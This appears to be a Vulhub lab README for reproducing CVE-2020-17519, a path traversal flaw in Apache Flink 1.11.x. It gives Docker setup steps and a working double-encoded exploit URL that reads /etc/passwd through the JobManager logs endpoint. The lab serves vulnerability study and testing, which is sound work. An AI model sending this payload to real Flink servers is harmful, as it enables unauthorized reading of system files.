Files
vulhub/flink/CVE-2020-17519/README.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

1.1 KiB

Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)

中文版本(Chinese version)

Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.

A vulnerability introduced in Apache Flink 1.11.0 (and present in versions 1.11.1 and 1.11.2) allows attackers to read arbitrary files from the local filesystem through the JobManager's REST interface. This path traversal vulnerability exists in the log viewing functionality.

References:

Environment Setup

Execute the following command to start an Apache Flink jobmanager 1.11.2:

docker compose up -d

After the Apache Flink service is started, visit http://your-ip:8081 to access the management interface.

Vulnerability Reproduction

Access the following URL to read the contents of /etc/passwd file from the target server:

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd